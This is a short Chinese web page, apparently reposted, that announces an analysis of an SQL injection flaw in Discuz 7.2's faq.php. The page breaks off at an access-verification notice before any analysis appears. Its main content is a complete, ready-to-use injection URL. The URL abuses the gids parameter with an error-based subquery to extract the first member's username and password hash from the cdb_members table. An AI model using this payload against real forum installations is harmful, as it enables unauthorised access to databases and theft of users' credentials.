阅读背景:

Discuz7.2版的faq.php SQL注入漏洞分析

来源:互联网 

!--NEWSZW_HZH_BEGIN--

注入代码实例:

复制代码 代码以下:

https://www.jb51.net/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x20,password) from cdb_members limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 http




你的当前访问异常,请进行认证后继续阅读剩余内容。

分享到: